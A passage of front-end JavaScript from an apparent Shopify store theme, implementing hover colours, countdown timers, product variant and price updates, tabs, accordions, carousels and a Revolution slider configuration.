        hoverColors.getCurrentColors($(this), attrName.baseColor, attrName.bgBaseColor, attrName.borderBaseColor );
      }}, '[data-hovercolors]'
    );
  },
  getCurrentColors: function(_, attr1, attr2, attr3){
    hoverColors.setCurrentColors(_, attr1, attr2, attr3);
    
    var not = _.attr('data-hovercolors-not');
    
    var ac = _.find('['+ attr1 +']');
    if(ac.length > 0) {
      ac.each(function(){
        if($(this).hasClass(not)) return;
        var c = $(this).attr(attr1);
        $(this).css('color', c);
      });
    }
    
    ac = _.find('['+ attr2 +']');
    if(ac.length > 0) {
      ac.each(function(){
        if($(this).hasClass(not)) return;
        hoverColors.setCurrentBgColor($(this), attr2);
      });
    }

    ac = _.find('['+ attr3 +']');
    if(ac.length > 0) {
      ac.each(function(){
        if($(this).hasClass(not)) return;
        hoverColors.setCurrentBorderColor($(this), attr3);
      });
    }
  },
  setCurrentBgColor: function(_, attr){
    var a = _.attr(attr);
    _.css({"background": a});
  },
  setCurrentBorderColor: function(_, attr){
    var a = _.attr(attr);
    if (typeof a !== typeof undefined && a !== false) {
      _.css('border-color', a);
    }
  },
  setCurrentColors: function(_, attr1, attr2, attr3){
    var c = _.attr(attr1);
    _.css('color', c);

    hoverColors.setCurrentBgColor(_, attr2);
    hoverColors.setCurrentBorderColor(_, attr3);

    return false;
  }
}
hoverColors.initEvents();

// Countdown
function countDown(showZero) {
  if ($(".pt-countdown").length) {

    var showZero = showZero || false;

    $(".pt-countdown").each(function() {
      var $this = $(this),
          date = $this.data('date'),
          nextYear = false,
          tz = $('[name=timezone]');
      
      if(typeof moment === "function" && tz.length) nextYear = moment.tz($this.data('date'), tz.attr('content'));

      if (date = date.split('-')) {
        date = date.join('/');
      } else return;

      var timezone = nextYear ? nextYear.toDate() : date;

      $this.countdown(timezone, function(e) {
        var format = '<span class="countdown-row">';

        function addFormat(func, timeNum, showZero) {
          if(timeNum === 0 && !showZero) return;

          func(format);
        };

        addFormat(function() {
          format += '<span class="countdown-section">'
          + '<span class="countdown-amount">' + e.offset.totalDays + '</span>'
          + '<span class="countdown-period">' + set_day + '</span>'
          + '</span>';
        }, e.offset.totalDays, showZero);

        addFormat(function() {
          format += '<span class="countdown-section">'
          + '<span class="countdown-amount">' + e.offset.hours + '</span>'
          + '<span class="countdown-period">' + set_hour + '</span>'
          + '</span>';
        }, e.offset.hours, showZero);

        addFormat(function() {
          format += '<span class="countdown-section">'
          + '<span class="countdown-amount">' + e.offset.minutes + '</span>'
          + '<span class="countdown-period">' + set_minute + '</span>'
          + '</span>';
        }, e.offset.minutes, showZero);

        addFormat(function() {
          format += '<span class="countdown-section">'
          + '<span class="countdown-amount">' + e.offset.seconds + '</span>'
          + '<span class="countdown-period">' + set_second + '</span>'
          + '</span>';
        }, e.offset.seconds, showZero);

        format += '</span>';

        $(this).html(format);
      });
    });
  }
};

$(document).ready(function() {

  "use strict";

  countDown(true);

  initProductOptions();
});

/* products options */
function initProductOptions(){
  $('body').on('change', '.productitem-option1-combo-js select', function(e){
    var $this = $(this).find('option:selected');
    setNewData($this, true);
    var val = $this.attr("data-tag") + '-js';
    var _parent = $this.closest('.pt-option-block');
    val = _parent.optionsSetParams(val, '.productitem-option2-js');
    _parent.optionsSetParams(val, '.productitem-option3-js');
  })
  $('body').on('click', '.productitem-option1-js a', function(e){
    var $this = $(this);
    optionsHandler(e, $this);
    var val = $this.parent().attr("data-tag") + '-js';
    var _parent = $this.closest('.pt-option-block');
    val = _parent.optionsSetParams(val, '.productitem-option2-js');
    _parent.optionsSetParams(val, '.productitem-option3-js');
  })
  $('body').on('click', '.productitem-option2-js a', function(e){
    var $this = $(this)
    optionsHandler(e, $this);
    var val = $this.parent().attr("data-tag") + '-js';
    var _parent = $this.closest('.pt-option-block');
    _parent.optionsSetParams(val, '.productitem-option3-js');
  });
  $('body').on('click', '.productitem-option3-js a', function(e){
    optionsHandler(e, $(this));
  });
}
function optionsHandler(e, $this){
  e.preventDefault();
  if($this.parent().hasClass('active')) return false;
  setNewData($this);
}
$.fn.optionsSetParams = function(val, str){
  var _opt = this.find(str);
  if(_opt.length == 0) return false;
  _opt.show().find('li').each(function(){ $(this).hide().removeClass('active') });
  if(_opt.find('[data-current-option="'+val+'"]').length == 0) return false;
  _opt.find('[data-current-option="'+val+'"]').show().first().addClass('active');
  return _opt.find('.active').find('a').parent().attr("data-tag") + '-js';
}
function setNewData($this, combobox){
  if (combobox === undefined) {
    combobox = false;
  }
  var _parent = combobox ? $this : $this.parent();
  if(!combobox){
    _parent.parent().find(".active").removeClass('active');
    _parent.addClass('active');
  }

  var availability = Boolean(_parent.data('variant_availability'));
  var $pr_parent = $this.closest('.options-js');

  $pr_parent.find('input').val(_parent.attr('data-var_id'));
  
  var img_src = _parent.attr('data-img');
  if(img_src != ''){
    if($(window).width() > '1024' && $pr_parent.find('.pt-img-roll-over').length) {
      $pr_parent.find('.pt-img-roll-over img').attr('src', img_src).removeAttr('srcset data-src data-srcset').removeClass('lazyload');
    }
    else{
      $pr_parent.find('.pt-img img').attr('src', img_src).removeAttr('srcset data-src data-srcset').removeClass('lazyload');
    }
  }

  var $btn = $pr_parent.find('.pt-btn-addtocart');
  $btn.attr('href', '/cart/add.js?quantity=1&id='+_parent.attr('data-var_id'));
  
  if($pr_parent.find('.compare-js').length){
  	$pr_parent.find('.compare-js').attr('data-compareid', _parent.attr('data-var_id'));
    $(window).trigger( "compareevent" );
  }
  
  availability ? $btn.find('span').last().html(addtocart_text).parent().removeClass('disable') : $btn.find('span').last().html(unavailable_text).parent().addClass('disable');

  var labelsale = $pr_parent.find('.pt-label-sale');
  var mainprice = $pr_parent.find('.pt-price span:not(.old-price)');
  var oldprice = $pr_parent.find('.old-price');
  mainprice.html(Shopify.formatMoney(_parent.attr('data-price'), money_format));
  var compprice = String(_parent.attr('data-compprice'));
  oldprice.html(Shopify.formatMoney(compprice, money_format));
  if(!compprice) {
    !oldprice.hasClass('hide') && oldprice.addClass('hide');
    mainprice.hasClass('new-price') && mainprice.removeClass('new-price');
    labelsale.length && labelsale.hide();
  }
  else {
    var _mainprice = Number(_parent.attr('data-price'));
    compprice = Number(compprice);
    if(_mainprice >= compprice){
      !oldprice.hasClass('hide') && oldprice.addClass('hide');
      mainprice.hasClass('new-price') && mainprice.removeClass('new-price');
      labelsale.length && labelsale.hide();
    }
    else{
      oldprice.hasClass('hide') && oldprice.removeClass('hide');
      !mainprice.hasClass('new-price') && mainprice.addClass('new-price');
      var per = Math.round(100 - (_mainprice / compprice)*100)+'%';
      labelsale.length && labelsale.show().find('.thumb_percent').html(per);
    }
  }
  
  $('body').trigger('refreshCurrency');
}

(function($){
  var methods = {
    init: function(options){
      return this.each(function(){
        var obj = $(this),
            objOpen = obj.find('.pt-item.active'),
            objItemTitle = obj.find('.pt-item .pt-accordeon-title');

        objOpen.find('.pt-accordeon-content').slideToggle(100);

        objItemTitle.on('click', function(){
          $(this).next().slideToggle(200).parent().toggleClass('active');
        });
      });
    }
  };
  $.fn.accordeon = function(action){
    if(methods[action]){
      return methods[action].apply(this, Array.prototype.slice.call(arguments, 1));
    } else if(typeof action === 'object' || !action){
      return methods.init.apply(this, arguments);
    } else {
      console.info('Action ' +action+ 'not found this plugin');
      return this;
    }
  };
  $('#pt-pageContent .pt-accordeon').accordeon();
})(jQuery);

//tabs
$.fn.ptTabs = function (options) {
  function ptTabs(tabs){
    var $tabs = $(tabs),
        $head = $tabs.find('.pt-tabs__head'),
        $head_ul = $head.find('> ul'),
        $head_li = $head_ul.find('> li'),
        $head_span = $head_li.find('> span'),
        $border = $head.find('.pt-tabs__border'),
        $body = $tabs.find('.pt-tabs__body'),
        $body_li = $body.find('> div'),
        anim_tab_duration = options.anim_tab_duration || 500,
        anim_scroll_duration = options.anim_scroll_duration || 500,
        breakpoint = 1025,
        scrollToOpenMobile = (options.scrollToOpenMobile !== undefined) ? options.scrollToOpenMobile : true,
        singleOpen = (options.singleOpen !== undefined) ? options.singleOpen : true,
        toggleOnDesktop = (options.toggleOnDesktop !== undefined) ? options.toggleOnDesktop : true,
        effect = (options.effect !== undefined) ? options.effect : 'slide',
        offsetTop = (options.offsetTop !== undefined) ? options.offsetTop : '',
        goToTab = options.goToTab,
        $btn_prev = $('<div>').addClass('tt-tabs__btn-prev disabled'),
        $btn_next = $('<div>').addClass('tt-tabs__btn-next'),
        btn_act = false,
        disableDesctop = options.disableDesctop || false;

    function _closeTab($li, desktop) {
      var anim_obj = {
        duration: anim_tab_duration,
        complete: function () {
          $(this).removeAttr('style');
        }
      };

      function _anim_func($animElem) {
        if(effect === 'toggle') {
          $animElem.hide().removeAttr('style');
        } else if(effect === 'slide') {
          $animElem.slideUp(anim_obj);
        } else {
          $animElem.slideUp(anim_obj);
        }
      };

      var $animElem;

      if(desktop || singleOpen) {
        $head_li.removeClass('active');
        $animElem = $body_li.filter('.active').removeClass('active').find('> div').stop();

        _anim_func($animElem);
      } else {
        var index = $head_li.index($li);

        $li.removeClass('active');
        $animElem = $body_li.eq(index).removeClass('active').find('> div').stop();

        _anim_func($animElem);
      }
    };

    function _openTab($li, desktop, beforeOpen, afterOpen, trigger) {
      var index = $head_li.index($li),
          $body_li_act = $body_li.eq(index),
          $animElem,
          anim_obj = {
            duration: anim_tab_duration,
            complete: function () {
              if(afterOpen) afterOpen($body_li_act);
            }
          };

      function _anim_func($animElem) {
        if(beforeOpen) beforeOpen($li.find('> span'));

        if(effect === 'toggle') {
          $animElem.show();
          if(afterOpen) afterOpen($body_li_act);
        } else if(effect === 'slide') {
          $animElem.slideDown(anim_obj);
        } else {
          $animElem.slideDown(anim_obj);
        }
      };

      $li.addClass('active');
      $animElem = $body_li_act.addClass('active').find('> div').stop();

      _anim_func($animElem);
    };

    function _replaceBorder($this, animate) {
      if($this.length) {
        var span_l = $this.get(0).getBoundingClientRect().left,
            head_l = $head.get(0).getBoundingClientRect().left,
            position = {
              left: span_l - head_l,
              width: $this.width()
            };
      } else {
        var position = {
          left: 0,
          width: 0
        };
      }

      if(animate) $border.stop().animate(position, anim_tab_duration);
      else $border.stop().css(position);
    };

    function _correctBtns($li, func) {
      var span_act_l = $li.find('> span').get(0).getBoundingClientRect().left,
          span_act_r = $li.find('> span').get(0).getBoundingClientRect().right,
          head_pos = {
            l: $head.get(0).getBoundingClientRect().left,
            r: $head.get(0).getBoundingClientRect().right
          };

      if(span_act_l < head_pos.l) {
        _replace_slider(Math.ceil(head_pos.l - span_act_l), head_pos, false, function () {
          func();
        });
      } else if(span_act_r > head_pos.r) {
        _replace_slider(Math.ceil(span_act_r - head_pos.r) * -1, head_pos, false, function () {
          func();
        });
      } else {
        func();
      }
    };

    $head.on('click', '> ul > li > span', function (e, trigger) {
      var $this = $(this),
          $li = $this.parent(),
          wind_w = window.innerWidth,
          desktop = wind_w > breakpoint,
          trigger = (trigger === 'trigger') ? true : false;

      if($li.hasClass('active')) {
        if(desktop && !toggleOnDesktop) return;

        _closeTab($li, desktop);

        _replaceBorder('', true);
      } else {
        _correctBtns($li, function () {
          _closeTab($li, desktop);

          _openTab($li, desktop,
                   function($li_act) {
            if(desktop) {
              var animate = !trigger;

              _replaceBorder($li_act, animate);
            }
          },
                   function ($body_li_act) {
            if(!desktop && !trigger && scrollToOpenMobile) {
              var tob_t = $body_li_act.offset().top;
              $('html, body').stop().animate({ scrollTop: tob_t }, {
                duration: anim_scroll_duration
              });
            }
          }
                  );
        });
      }
    });

    $body.on('click', '> div > span', function (e) {
      var $this = $(this),
          $li = $this.parent(),
          index = $body_li.index($li);

      $head_li.eq(index).find('> span').trigger('click');
    });

    function _toTab(tab, scrollTo, focus) {
      var wind_w = window.innerWidth,
          desktop = wind_w < breakpoint,
          header_h = 0,
          $sticky = $(offsetTop),
          $openTab = $head_li.filter('[data-tab="' + tab + '"]'),
          $scrollTo = $(scrollTo),
          toTab = {};

      if(desktop && $sticky.length) {
        header_h = $sticky.height();
      }

      if(!$openTab.hasClass('active')) {
        toTab = { scrollTop: $tabs.offset().top - header_h };
      }

      $('html, body').stop().animate(toTab, {
        duration: anim_scroll_duration,
        complete: function () {
          _correctBtns($openTab, function () {
            _closeTab($openTab, desktop);

            _openTab($openTab, desktop,
                     function($li_act) {
              _replaceBorder($li_act, true);
            },
                     function () {
              if ($scrollTo.length) {
                $('html, body').animate({ scrollTop: $scrollTo.offset().top - header_h }, {
                  duration: anim_scroll_duration,
                  complete: function () {
                    var $focus = $(focus);

                    if ($focus.length) $focus.focus();
                  }
                });
              }
            }
                    );
          })
        }
      });
    };

    if($.isArray(goToTab) && goToTab.length) {
      $(goToTab).each(function () {
        var elem = this.elem,
            tab = this.tab,
            scrollTo = this.scrollTo,
            focus = this.focus;

        $(elem).on('click', function (e) {
          _toTab(tab, scrollTo, focus);

          e.preventDefault();
          return false;
        });
      });
    }

    function _btn_disabled(head_pos) {
      var span_pos = {
        l: $head_li.first().find('> span').get(0).getBoundingClientRect().left,
        r: $head_li.last().find('> span').get(0).getBoundingClientRect().right
      };

      if(span_pos.l < head_pos.l) $btn_prev.removeClass('disabled');
      else $btn_prev.addClass('disabled');

      if(span_pos.r > head_pos.r) $btn_next.removeClass('disabled');
      else $btn_next.addClass('disabled');
    };

    function _replace_slider(difference, head_pos, resize, afterReplace) {
      var ul_pos = parseInt($head_ul.css('left'), 10),
          border_pos = parseInt($border.css('left'), 10),
          duration = (!resize) ? anim_tab_duration : 0,
          anim_pos = {
            'left': ul_pos + difference
          };

      if(resize) {
        $head_ul.css(anim_pos);
        _btn_disabled(head_pos);
      } else {
        $border.animate({ 'left': border_pos + difference }, anim_tab_duration);

        $head_ul.animate(anim_pos, {
          duration: duration,
          complete: function () {
            _btn_disabled(head_pos);
            if(afterReplace) afterReplace();
            btn_act = false;
          }
        });
      }
    };

    $tabs.on('click', '.pt-tabs__btn-prev, .pt-tabs__btn-next', function () {
      var $btn = $(this);

      if($btn.hasClass('disabled') || btn_act) return;

      btn_act = true;

      var head_pos = {
        l: $head.get(0).getBoundingClientRect().left,
        r: $head.get(0).getBoundingClientRect().right
      };

      if($btn.hasClass('tt-tabs__btn-next')) {
        $head_span.each(function (i) {
          var $this = $(this),
              this_r = $this.get(0).getBoundingClientRect().right;

          if(this_r > head_pos.r) {
            _replace_slider(Math.ceil(this_r - head_pos.r) * -1, head_pos);
            return false;
          }
        });
      } else if($btn.hasClass('tt-tabs__btn-prev')) {
        $($head_span.get().reverse()).each(function (i) {
          var $this = $(this),
              this_l = $this.get(0).getBoundingClientRect().left;

          if(this_l < head_pos.l) {
            _replace_slider(Math.ceil(head_pos.l - this_l), head_pos);
            return false;
          }
        });
      }
    });
    $(window).on('resize load', function () {
      var wind_w = window.innerWidth,
          desktop = wind_w > breakpoint,
          head_w = $head.innerWidth(),
          li_w = 0;

      $head_li.each(function () {
        li_w += $(this).innerWidth();
      });


      if(desktop && !disableDesctop === true){
        var $li_act = $head_li.filter('.active'),
            $span_act = $li_act.find('> span');

        if(!singleOpen && $span_act.length > 1) {
          var $save_active = $li_act.first();

          _closeTab('', desktop);
          _openTab($save_active, desktop);
        }

        if(li_w > head_w) {
          $head.addClass('slider').append($btn_prev).append($btn_next);

          $head_ul.css({ 'margin-right' : (li_w - $head.innerWidth()) * -1 });

          if($span_act.length) {

            var span_act_r = $span_act.get(0).getBoundingClientRect().right,
                span_last_r = $head_span.last().get(0).getBoundingClientRect().right,
                head_pos = {
                  l: $head.get(0).getBoundingClientRect().left,
                  r: $head.get(0).getBoundingClientRect().right
                };

            if(span_act_r > head_pos.r) {
              _replace_slider(Math.ceil(span_act_r - head_pos.r) * -1, head_pos, true);
            } else if(span_last_r < head_pos.r) {
              _replace_slider(head_pos.r - span_last_r, head_pos, true);
            }

            _replaceBorder($span_act, false);
          }

        } else {
          $head_ul.removeAttr('style');
          $btn_prev.remove();
          $btn_next.remove();
          $head.removeClass('slider');
          _replaceBorder($span_act, false);
        }

        $head.css({ 'visibility': 'visible' });
      } else {
        $border.removeAttr('style');
      }
    });

    $head_li.filter('[data-active="true"]').find('> span').trigger('click', ['trigger']);

    return $tabs;
  };

  var tabs = new ptTabs($(this).eq(0));

  return tabs;
};
// Tabs Gorizontal
if (blocks.ptTabsGorizontal.length) {
  blocks.ptTabsGorizontal.ptTabs({
    singleOpen: true,
    anim_tab_duration: 270,
    anim_scroll_duration: 500,
    toggleOnDesktop: false,
    scrollToOpenMobile: true,
    effect: 'slide',
    offsetTop: '.pt-header[data-sticky="true"]'
  });
};


/* Section */
$(document)
.on('shopify:section:load', eventHandler)
.ready(function() {
  $('[data-sectionname]').each(function(){ $(this).initSection() });
  lazyload();
  initSkrollr();
});

function eventHandler(e) {
  $('#' + e.target.id).find('[data-sectionname]').initSection();
  lazyload();
  initSkrollr();
}
function initSkrollr(){
  if($('[data-bottom-top]').length && !/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
    skrollr.init();
  }
}

$.fn.initSection = function(){
  var _ = this;
  var n = _.data('sectionname');

  switch (n) {
      
    case ("header_section"): 
      _.find('.pt-top-panel').length && headerInfoBar();
      _.find('.js-header-slider').length && _.find('.js-header-slider').headerNewSlider();
      break;
    case ("index_sectionproducts"): _.find('.pt-carousel-products-js').initSlick(3, 2, 2); break;
    case ("index_instagram"): _.index_instagram(); break;
    case ("index_horizontaltabs"): _.initTabs(); break;
    case ("index_sectionlookbookmasonry"): _.find('.pt-lookbook-init').initMasonryLookbook(); break;
    case ("index_sectionmasonry_products"): _.find('.pt-product-index-init').initMasonryLookbook(); break;
    case ("index_brands"): _.find('.pt-carousel-brands').initSlickBrands(6, 4, 3, 2, 1); break;
    case ("index_testimonials"): _.find('.pt-reviewsbox-listing').initSlickTest(2, 1); break;
    case ("index_revolution"): _.find('.slider-revolution').initRevolution(); break;
    case ("index_simplebanners2"): _.find('.js-init-carousel').initSlickBanners2(); break;
    case ("index_revslider"): _.find('.js-init-parallax').fnInitParallax(); break;
    default: break;
  }
}

$.fn.initTabs = function(){
  var _ = this;
  if(!_.find('[role="tabpanel"]').length) return false;
  var a = _.find('[role="tabpanel"]').first().find('.ajaxcontent');
  getTabcontent(a);
  
  if(_.find('.nav-link').length){
    _.on('mouseenter', function(){
      _.find('.nav-link').on('click', placeArrows).each(function(){
        var href = $(this).attr('href');
        getTabcontent($(href).find('.ajaxcontent'));
      })
    })
  }
}
function getTabcontent(a){
  if(!a.length || !a.hasClass('startajax')) return false;
  a.removeClass('startajax')
  var url = '/collections/all?view=collectiontabs&constraint=' + a.attr('data-content'),
      params = {
        type: "get",
        url: url,
        success: function(data){
          var p = a.parent();
          a.replaceWith(data);
          if(a.hasClass('slider')){
            p.find('.pt-carousel-products-js').initSlick(3, 2, 2);
            placeArrows();
            if($(".spr-badge").length > 0) {
              $.getScript(window.location.protocol + "//productreviews.shopifycdn.com/assets/v4/spr.js");
            }
          }
          lazyload();
          $('body').trigger('refreshCurrency');
          ptProductSmall();
          countDown(true);
        }
      }
  jQuery.ajax(params);
}

$.fn.fnInitParallax = function() {
  var jsInitParallax = this;
  if (jsInitParallax.length){
    initParallax();
  };
  $(window).resize(function(e) {
    var ttwindowWidth = window.innerWidth || $window.width();
    if(ttwindowWidth > 790){
      initParallax();
    };
  });
  function initParallax(){
    jsInitParallax.each(function(){
      var obj = $(this),
          orientation = $(this).data('orientation'),
          overflow = $(this).data('overflow'),
          scale = $(this).data('scale');

      new simpleParallax(obj, {
        overflow: overflow || false,
        scale: scale || 1.2,
        breakpoint: 790,
        orientation: orientation,
      });
    });
  };
}

function headerInfoBar() {
  var objTopPanel = $ptHeader.find('.pt-top-panel'),
      objTopPanelLink = objTopPanel.find(".js-toppanel-link-dropdown");
  //close block
  objTopPanel.each(function(){
    $(this).on('click', '.js-removeitem', function(){
      $(this).closest(objTopPanel).slideUp(200);
    });
  });
  //link dropdown
  function ptLinkDropdown(){
    var windW = window.innerWidth || $window.width();

    $(document).on('mouseenter mouseleave click', '.js-toppanel-link-dropdown', function(e){
      var $this = $(this),
          target = e.target,
          windW = window.innerWidth;

      if (e.type === 'mouseenter' && e.relatedTarget && windW > 1024) {
        ttOnHover();
      } else if (e.type === 'mouseleave' && e.relatedTarget && windW > 1024){
        ttOffHover();
      };
      if (e.type === 'click' && windW <= 1024){
        $this.toggleClass('is-active');
      }
      function ttOnHover(e){
        $this.addClass('is-active');
        return false;
      };
      function ttOffHover(e){
        $this.removeClass('is-active');
        return false
      };
    });
  };
  ptLinkDropdown();
  $(window).resize(function(e){
    checkOpenObject();
  });
  function checkOpenObject(){
    objTopPanel.find('.js-toppanel-link-dropdown').each(function(){
      if($(this).hasClass("is-active")){
        $(this).removeClass('is-active');
      };
    });
  };
  $(document).mouseup(function(e){
    if (! objTopPanel.is(e.target) &&  objTopPanel.has(e.target).length === 0){
      objTopPanelLink.removeClass('is-active');
    }
  });
};


$.fn.headerNewSlider = function() {
  this.slick({
    dots: false,
    arrows: false,
    infinite: true,
    slidesToShow: 1,
    adaptiveHeight: false,
  });
  this.addClass('slick-show-news');
}

$.fn.initSlick = function(md, sm, xs) {
  this.slick({
    dots: true,
    arrows: true,
    infinite: true,
    adaptiveHeight: true,
    responsive:
    [
      {
        breakpoint: 1025,
        settings: {
          slidesToShow: md,
          slidesToScroll: md
        }
      },
      {
        breakpoint: 791,
        settings: {
          slidesToShow: sm,
          slidesToScroll: sm
        }
      },
      {
        breakpoint: 480,
        settings: {
          slidesToShow: xs,
          slidesToScroll: xs
        }
      }
    ]
  });
}

$.fn.initSlickTest = function(md, xs) {
  this.slick({
    dots: true,
    arrows: false,
    infinite: true,
    adaptiveHeight: true,
    slidesToShow: md,
    slidesToScroll: 1,
    responsive: 
    [
      {
        breakpoint: 790,
        settings: {
          slidesToShow: xs
        }
      }
    ]
  });
}

$.fn.initSlickBrands = function(md, sm, sm2, xs, xs2) {
  this.slick({
    dots: false,
    arrows: true,
    infinite: true,
    adaptiveHeight: true,
    responsive: [
      {
        breakpoint: 1230,
        settings: {
          slidesToShow: md,
          slidesToScroll: md
        }
      },
      {
        breakpoint: 1025,
        settings: {
          slidesToShow: sm,
          slidesToScroll: sm
        }
      },
      {
        breakpoint: 790,
        settings: {
          slidesToShow: sm2,
          slidesToScroll: sm2
        }
      },
      {
        breakpoint: 576,
        settings: {
          slidesToShow: xs,
          slidesToScroll: xs
        }
      },
      {
        breakpoint: 380,
        settings: {
          slidesToShow: xs2,
          slidesToScroll: xs2
        }
      }
    ]
  });
};
$.fn.initSlickBanners2 = function() {
  this.slick({
    dots: true,
    arrows: true,
    infinite: true,
    speed: 300,
    adaptiveHeight: true,
    responsive: [
      {
        breakpoint: 1025,
        settings: {
          slidesToShow: 3,
          slidesToScroll: 3
        }
      },
      {
        breakpoint: 791,
        settings: {
          slidesToShow: 2,
          slidesToScroll: 2
        }
      }
    ]
  });
}

$.fn.initMasonryLookbook = function() {
  if($('body').find('.isotope_included').length == 0)
  {
    this.replaceWith('<span class="text-center" style="display: inherit;">Save and reload page.</span>');
    return false;
  }

  var _ = this;

  var iso = _.isotope({
    itemSelector: '.element-item',
    layoutMode: 'masonry',
    gutter: 0
  });
  // layout Isotope after each image loads
  iso.imagesLoaded().progress( function(index) {
    iso.addClass('pt-show').isotope('layout');
  });
}

$.fn.index_instagram = function(){
  var m = this.find('[data-username]');
  if (!(typeof $.instagramFeed === 'function')) {
    m.replaceWith('<span class="text-center" style="display: inherit;">Save and reload page.</span>');
  	return false;
  }
  
  var a = m.attr('id');
  var username = m.data('username');
  var hashtag = m.data('hashtag');
  var count = m.data('count');

  if(username == '' && hashtag == '') return false;
  
  $.instagramFeed({
    'tag': hashtag,
    'username': username,
    'container': '#'+a,
    'display_profile': false,
    'display_biography': false,
    'display_gallery': true,
    'styling': false,
    'items': count,
    'margin': 0
  });
}

//REVOLUTION SLIDER (function to reset the plug on the breakpoints)

$.fn.initRevolution = function(){

  if($('body').find('.revolution_included').length == 0)
  {
    this.replaceWith('<span class="text-center" style="display: inherit;">Save and reload page.</span>');
    return false;
  }
  
  function click_to_play_video() {
    var $this = $(this),
      $video = $this.find('li video');

    if (!$video.length) return;

    $video.on('play', function() {
      var $btn = $(this).parents('li').find('.video-play');

      $btn.addClass('pause');
      $(this).parents('.tp-caption.fullscreenvideo').addClass('click-video');
    });

    $video.on('pause ended', function() {
      var $btn = $(this).parents('li').find('.video-play');

      $btn.removeClass('pause');
    });

    $this.find('.video-play').on('click', function(e) {
      var $video = $(this).parents('li').find('video');

      $video.trigger('click');
      e.preventDefault();
      e.stopPropagation();
      return false;
    });

    $this.on('revolution.slide.onbeforeswap', function(event, data) {
      $(this).find('.tp-caption.fullscreenvideo').removeClass('click-video');
    });
  };

  function autoplay_video(elem) {
    var $get_sliders = $(this);

    $get_sliders.each(function() {
      var $slider = $(this);

      var set_event = function() {
        $slider.on('revolution.slide.onchange', function(event, data) {
          var $this = $(this),
            $active_slide = $this.find('li').eq(data.slideIndex - 1),
            $video = $active_slide.find('video'),
            autoplay = $active_slide.find('.tp-caption').attr('data-autoplay');

          if ($video.length && autoplay === 'true') {
            var video = $video.get(0);

            video.currentTime = 0;

            $slider.one('revolution.slide.onafterswap', function(event, data) {
              if (video.paused) {
                video.play();
              }
            });
          }
        });
      };

      if ($slider.hasClass('revslider-initialised')) {
        set_event();
      } else {
        $slider.one('revolution.slide.onloaded', function() {
          set_event();
        });
      }
    });
  };

  $.fn.resizeRevolution = function(options, new_rev_obj, bp_arr, revdelay) {
    if (!$(this).length || !$(options.slider).length || !options.breakpoints) return false;

    var wrapper = this,
      slider = options.slider,
      breakpoints = options.breakpoints,
      fullscreen_BP = options.fullscreen_BP || false,
      new_rev_obj = new_rev_obj || {},
      bp_arr = bp_arr || [],
      rev_obj = {
        dottedOverlay: "none",
        delay: revdelay,
        startwidth: 1920,
        hideThumbs: 200,
        hideTimerBar: "on",

        thumbWidth: 100,
        thumbHeight: 50,
        thumbAmount: 5,

        navigationArrows: "none",

        touchenabled: "on",
        onHoverStop: "on",

        swipe_velocity: 0.7,
        swipe_min_touches: 1,
        swipe_max_touches: 1,
        drag_block_vertical: false,

        parallax: "mouse",
        parallaxBgFreeze: "on",
        parallaxLevels: [7, 4, 3, 2, 5, 4, 3, 2, 1, 0],

        keyboardNavigation: "off",

        navigationHAlign: "center",
        navigationVAlign: "bottom",
        navigationHOffset: 0,
        navigationVOffset: 20,

        soloArrowLeftHalign: "left",
        soloArrowLeftValign: "center",
        soloArrowLeftHOffset: 20,
        soloArrowLeftVOffset: 0,

        soloArrowRightHalign: "right",
        soloArrowRightValign: "center",
        soloArrowRightHOffset: 20,
        soloArrowRightVOffset: 0,

        shadow: 0,

        spinner: "",
        h_align: "left",

        stopLoop: "off",
        stopAfterLoops: -1,
        stopAtSlide: -1,

        shuffle: "off",

        autoHeight: "off",
        forceFullWidth: "off",

        hideThumbsOnMobile: "off",
        hideNavDelayOnMobile: 1500,
        hideBulletsOnMobile: "off",
        hideArrowsOnMobile: "off",
        hideThumbsUnderResolution: 0,

        hideSliderAtLimit: 0,
        hideCaptionAtLimit: 0,
        hideAllCaptionAtLilmit: 0,
        startWithSlide: 0,
        fullScreenOffsetContainer: ""
      };

    $.extend(rev_obj, new_rev_obj);

    var get_Slider = function($sliderWrapp) {
      return $sliderWrapp.find(slider);
    };

    var get_current_bp = function() {
      var wind_W = window.innerWidth;

      for (var i = 0; i < breakpoints.length; i++) {
        var bp = breakpoints[i];

        if (!breakpoints.length) return false;

        if (wind_W <= bp) {
          if (i === 0) {
            return bp;
          } else {
            if (bp > breakpoints[i - 1])
              return bp;
          }
        } else if (wind_W > bp && i === breakpoints.length - 1)
          return Infinity;
      }
      return false;
    };

    var $sliderWrappers = $(wrapper);

    $sliderWrappers.each(function() {
      var $sliderWrapp = $(this),
        $sliderInit = get_Slider($sliderWrapp),
          $sliderCopy = $sliderWrapp.clone(),
          bp = get_current_bp();

      if (!$sliderInit.length) return false;

      var start_Rev = function($sliderInit, bp) {
        var wind_W = window.innerWidth,
          rev_settings_obj = {},
          rev_screen_obj = {},
          set_rev_obj = {};

        if (fullscreen_BP) {
          var full_width = (wind_W >= fullscreen_BP) ? 'off' : 'on',
            full_screen = (wind_W >= fullscreen_BP) ? 'on' : 'off';

          rev_screen_obj = {
            fullWidth: full_width,
            fullScreen: full_screen
          };
        }

        if (bp_arr.length) {
          for (var i = 0; i < bp_arr.length; i++) {
            var this_obj = bp_arr[i];

            if (this_obj.bp && this_obj.bp.length === 2 && this_obj.bp[0] < this_obj.bp[1]) {
              var from = this_obj.bp[0],
                to = this_obj.bp[1];

              if (from <= bp && to >= bp) {
                for (var key in this_obj) {
                  if (key !== 'bp')
                    rev_settings_obj[key] = this_obj[key];
                }
              }
            }
          }
        }

        $.extend(set_rev_obj, rev_obj, rev_settings_obj, rev_screen_obj);

        $($sliderInit).show().revolution(set_rev_obj);

        $(options.functions).each(function() {
          this.call($sliderInit);
        });
      };

      start_Rev($sliderInit, bp);

      var restart_Rev = function(current_bp) {
        if (!$($sliderInit).hasClass('revslider-initialised')) return;
        bp = current_bp || 0;
        $sliderInit.revkill();
        $sliderWrapp.replaceWith($sliderCopy);
        $sliderWrapp = $sliderCopy;
        $sliderCopy = $sliderWrapp.clone();
        $sliderInit = get_Slider($sliderWrapp);
        start_Rev($sliderInit, bp);
      };

      function endResize(func) {
        var windWidth = window.innerWidth,
          interval;

        interval = setInterval(function() {
          var windWidthInterval = window.innerWidth;
          if (windWidth === windWidthInterval) {
            setTimeout(function() {
              func();
            }, 200);
          }
          clearInterval(interval);
        }, 100);
      };

      $(window).on('resize', function() {
        endResize(function() {
          var current_bp = get_current_bp();
          if (current_bp !== bp)
            restart_Rev(current_bp);
        })
      });
    });
  };
